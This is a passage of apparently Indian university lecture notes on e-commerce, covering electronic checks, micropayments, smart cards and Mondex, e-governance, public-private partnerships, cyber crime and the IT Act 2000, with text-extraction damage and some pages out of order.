who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
